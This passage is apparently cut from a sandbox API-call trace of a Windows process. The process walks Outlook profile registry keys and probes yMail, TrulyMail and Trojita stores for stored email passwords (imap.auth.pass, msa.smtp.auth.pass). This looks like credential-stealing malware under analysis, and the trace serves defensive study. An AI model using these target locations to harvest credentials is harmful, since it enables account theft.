phkResult=0x6ab4a0*=0x204) returned 0x0 [0148.167] GetProcessHeap () returned 0x690000 [0148.167] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.168] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.168] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0148.169] GetProcessHeap () returned 0x690000 [0148.169] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.171] RegCloseKey (hKey=0x204) returned 0x0 [0148.171] GetProcessHeap () returned 0x690000 [0148.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0148.171] GetProcessHeap () returned 0x690000 [0148.171] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.173] RegCloseKey (hKey=0x210) returned 0x0 [0148.173] GetProcessHeap () returned 0x690000 [0148.173] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0148.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.174] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xb, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="e57f6d0b27b6134693ca7113a4ab34a6", pcchName=0x19fb7c) returned 0x0 [0148.174] GetProcessHeap () returned 0x690000 [0148.174] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0148.174] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.175] RegOpenKeyW (in: hKey=0x218, lpSubKey="e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x6ab460 | out: phkResult=0x6ab460*=0x210) returned 0x0 [0148.175] GetProcessHeap () returned 0x690000 [0148.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.175] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.176] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0148.176] GetProcessHeap () returned 0x690000 [0148.176] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.176] GetProcessHeap () returned 0x690000 [0148.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.177] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.177] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6") returned 88 [0148.177] GetProcessHeap () returned 0x690000 [0148.177] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0148.177] GetProcessHeap () returned 0x690000 [0148.178] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.178] GetProcessHeap () returned 0x690000 [0148.178] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0148.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.179] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\e57f6d0b27b6134693ca7113a4ab34a6", phkResult=0x6ab330 | out: phkResult=0x6ab330*=0x204) returned 0x0 [0148.180] GetProcessHeap () returned 0x690000 [0148.180] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.181] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0148.181] GetProcessHeap () returned 0x690000 [0148.181] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.183] RegCloseKey (hKey=0x204) returned 0x0 [0148.183] GetProcessHeap () returned 0x690000 [0148.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0148.183] GetProcessHeap () returned 0x690000 [0148.183] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.185] RegCloseKey (hKey=0x210) returned 0x0 [0148.185] GetProcessHeap () returned 0x690000 [0148.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0148.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.186] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xc, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="f35c115766b7c94cb080da6869ae8f9d", pcchName=0x19fb7c) returned 0x0 [0148.186] GetProcessHeap () returned 0x690000 [0148.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0148.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.187] RegOpenKeyW (in: hKey=0x218, lpSubKey="f35c115766b7c94cb080da6869ae8f9d", phkResult=0x6ab480 | out: phkResult=0x6ab480*=0x210) returned 0x0 [0148.187] GetProcessHeap () returned 0x690000 [0148.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.188] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0148.188] GetProcessHeap () returned 0x690000 [0148.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.189] GetProcessHeap () returned 0x690000 [0148.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.190] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.191] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d") returned 88 [0148.191] GetProcessHeap () returned 0x690000 [0148.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0148.191] GetProcessHeap () returned 0x690000 [0148.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.191] GetProcessHeap () returned 0x690000 [0148.191] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0148.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.193] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f35c115766b7c94cb080da6869ae8f9d", phkResult=0x6ab440 | out: phkResult=0x6ab440*=0x204) returned 0x0 [0148.193] GetProcessHeap () returned 0x690000 [0148.193] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.194] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0148.194] GetProcessHeap () returned 0x690000 [0148.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.196] RegCloseKey (hKey=0x204) returned 0x0 [0148.196] GetProcessHeap () returned 0x690000 [0148.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0148.196] GetProcessHeap () returned 0x690000 [0148.196] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.197] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.198] RegCloseKey (hKey=0x210) returned 0x0 [0148.198] GetProcessHeap () returned 0x690000 [0148.198] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0148.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.199] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xd, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="f86ed2903a4a11cfb57e524153480001", pcchName=0x19fb7c) returned 0x0 [0148.199] GetProcessHeap () returned 0x690000 [0148.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0148.200] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.201] RegOpenKeyW (in: hKey=0x218, lpSubKey="f86ed2903a4a11cfb57e524153480001", phkResult=0x6ab4c0 | out: phkResult=0x6ab4c0*=0x210) returned 0x0 [0148.210] GetProcessHeap () returned 0x690000 [0148.210] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.213] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x6abd08, pcbData=0x19f6f0*=0x208) returned 0x2 [0148.213] GetProcessHeap () returned 0x690000 [0148.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.214] GetProcessHeap () returned 0x690000 [0148.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.215] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.215] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001") returned 88 [0148.215] GetProcessHeap () returned 0x690000 [0148.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb4) returned 0x6aa2c8 [0148.216] GetProcessHeap () returned 0x690000 [0148.216] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.219] GetProcessHeap () returned 0x690000 [0148.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0148.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.220] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001", phkResult=0x6ab3d0 | out: phkResult=0x6ab3d0*=0x204) returned 0x0 [0148.221] GetProcessHeap () returned 0x690000 [0148.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6abd08 [0148.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.222] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x6abd08, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0148.222] GetProcessHeap () returned 0x690000 [0148.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0148.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.224] RegCloseKey (hKey=0x204) returned 0x0 [0148.224] GetProcessHeap () returned 0x690000 [0148.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0148.224] GetProcessHeap () returned 0x690000 [0148.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.225] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.226] RegCloseKey (hKey=0x210) returned 0x0 [0148.226] GetProcessHeap () returned 0x690000 [0148.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0148.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.227] SHEnumKeyExW (in: hkey=0x218, dwIndex=0xe, pszName=0x6ab8f0, pcchName=0x19fb7c | out: pszName="", pcchName=0x19fb7c) returned 0x103 [0148.227] GetProcessHeap () returned 0x690000 [0148.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab8f0 | out: hHeap=0x690000) returned 1 [0148.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0148.229] RegCloseKey (hKey=0x218) returned 0x0 [0148.229] GetProcessHeap () returned 0x690000 [0148.229] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0148.229] GetProcessHeap () returned 0x690000 [0148.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0148.230] GetProcessHeap () returned 0x690000 [0148.230] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b3e0 | out: hHeap=0x690000) returned 1 [0148.230] GetProcessHeap () returned 0x690000 [0148.230] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.231] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.232] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.232] GetProcessHeap () returned 0x690000 [0148.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6aca08 [0148.233] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.234] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\yMail2\\POP3.xml", arglist=0x19fae8 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 47 [0148.234] GetProcessHeap () returned 0x690000 [0148.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x62) returned 0x6aa740 [0148.234] GetProcessHeap () returned 0x690000 [0148.235] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.236] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\POP3.xml") returned 0 [0148.236] GetProcessHeap () returned 0x690000 [0148.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.237] GetProcessHeap () returned 0x690000 [0148.237] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.237] GetProcessHeap () returned 0x690000 [0148.237] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.238] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.239] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.239] GetProcessHeap () returned 0x690000 [0148.239] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6aca08 [0148.240] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.240] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\yMail2\\SMTP.xml", arglist=0x19fadc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 47 [0148.240] GetProcessHeap () returned 0x690000 [0148.240] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x62) returned 0x6aa740 [0148.241] GetProcessHeap () returned 0x690000 [0148.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.242] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\SMTP.xml") returned 0 [0148.243] GetProcessHeap () returned 0x690000 [0148.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.243] GetProcessHeap () returned 0x690000 [0148.244] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.244] GetProcessHeap () returned 0x690000 [0148.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.245] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.246] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.246] GetProcessHeap () returned 0x690000 [0148.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6c) returned 0x6aca08 [0148.246] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.247] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\yMail2\\Accounts.xml", arglist=0x19fad0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 51 [0148.247] GetProcessHeap () returned 0x690000 [0148.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6a) returned 0x6aa740 [0148.247] GetProcessHeap () returned 0x690000 [0148.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.249] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail2\\Accounts.xml") returned 0 [0148.249] GetProcessHeap () returned 0x690000 [0148.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.249] GetProcessHeap () returned 0x690000 [0148.250] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.250] GetProcessHeap () returned 0x690000 [0148.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.250] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.345] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.345] GetProcessHeap () returned 0x690000 [0148.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6aca08 [0148.346] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.346] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\yMail\\ymail.ini", arglist=0x19fac4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 47 [0148.346] GetProcessHeap () returned 0x690000 [0148.346] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x62) returned 0x6aa740 [0148.347] GetProcessHeap () returned 0x690000 [0148.347] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.348] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.348] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\yMail\\ymail.ini") returned 0 [0148.349] GetProcessHeap () returned 0x690000 [0148.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.349] GetProcessHeap () returned 0x690000 [0148.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.350] GetProcessHeap () returned 0x690000 [0148.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6ab500 [0148.350] GetProcessHeap () returned 0x690000 [0148.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b3e0 [0148.350] GetProcessHeap () returned 0x690000 [0148.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab8f0 [0148.351] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.351] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="imap.auth.pass", pdwType=0x0, pvData=0x6ab8f0, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x6ab8f0, pcbData=0x19fa1c*=0x104) returned 0x2 [0148.351] GetProcessHeap () returned 0x690000 [0148.351] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab8f0 | out: hHeap=0x690000) returned 1 [0148.351] GetProcessHeap () returned 0x690000 [0148.351] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6ab8f0 [0148.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.353] SHGetValueW (in: hkey=0x80000001, pszSubKey="SOFTWARE\\flaska.net\\trojita", pszValue="msa.smtp.auth.pass", pdwType=0x0, pvData=0x6ab8f0, pcbData=0x19fa1c*=0x104 | out: pdwType=0x0, pvData=0x6ab8f0, pcbData=0x19fa1c*=0x104) returned 0x2 [0148.353] GetProcessHeap () returned 0x690000 [0148.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab8f0 | out: hHeap=0x690000) returned 1 [0148.353] GetProcessHeap () returned 0x690000 [0148.353] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0148.354] GetProcessHeap () returned 0x690000 [0148.354] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b3e0 | out: hHeap=0x690000) returned 1 [0148.354] GetProcessHeap () returned 0x690000 [0148.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8c) returned 0x6aca08 [0148.354] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.355] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\TrulyMail\\Data\\Settings\\user.config", arglist=0x19fb40 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 73 [0148.356] GetProcessHeap () returned 0x690000 [0148.356] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x96) returned 0x6aa2c8 [0148.356] GetProcessHeap () returned 0x690000 [0148.356] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0148.357] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\TrulyMail\\Data\\Settings\\user.config") returned 0 [0148.357] GetProcessHeap () returned 0x690000 [0148.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0148.358] GetProcessHeap () returned 0x690000 [0148.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x12c) returned 0x6aa2c8 [0148.358] GetProcessHeap () returned 0x690000 [0148.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b3e0 [0148.358] GetProcessHeap () returned 0x690000 [0148.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.359] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.359] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0148.360] Sleep (dwMilliseconds=0xa) [0148.378] GetProcessHeap () returned 0x690000 [0148.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.379] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.379] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f8fc | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn") returned 37 [0148.380] GetProcessHeap () returned 0x690000 [0148.380] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4e) returned 0x6aa740 [0148.380] GetProcessHeap () returned 0x690000 [0148.380] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.381] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\*.spn"), lpFindFileData=0x19f910 | out: lpFindFileData=0x19f910*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x697858, nFileSizeHigh=0x6a3fb8, nFileSizeLow=0x6a46e0, dwReserved0=0x0, dwReserved1=0x19f96c, cFileName="ը睉", cAlternateFileName="뒭蕬͈읩ᅻ䇰ﭴ\x19䂑@")) returned 0xffffffff [0148.381] GetProcessHeap () returned 0x690000 [0148.381] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa740 | out: hHeap=0x690000) returned 1 [0148.382] GetProcessHeap () returned 0x690000 [0148.382] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa530 | out: hHeap=0x690000) returned 1 [0148.382] GetProcessHeap () returned 0x690000 [0148.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa530 [0148.383] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0148.383] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6aa530 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0148.384] Sleep (dwMilliseconds=0xa) [0148.398] GetProcessHeap () returned 0x690000 [0148.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f4a) returned 0x6aca08 [0148.399] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0148.400] wvsprintfW (in: param_1=0x6aca08, param_2="%s\\%s", arglist=0x19f8e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn") returned 35 [0148.400] GetProcessHeap () returned 0x690000 [0148.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x6aa740 [0148.400] GetProcessHeap () returned 0x690000 [0148.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aca08 | out: hHeap=0x690000) returned 1 [0148.401] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*.spn" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\*.spn"), lpFindFileData=0x19f8f8 | out: lpFindFileData=0x19f8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x207d0, ftCreationTime.dwHighDateTime=0x20000, ftLastAccessTime.dwLowDateTime=0x48, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x697858, ftLastWriteTime.dwHighDateTime=0x697858, nFileSizeHigh=0x6a3fb8, nFileSizeLow=0x6a46e0, dwReserved0=0x0, 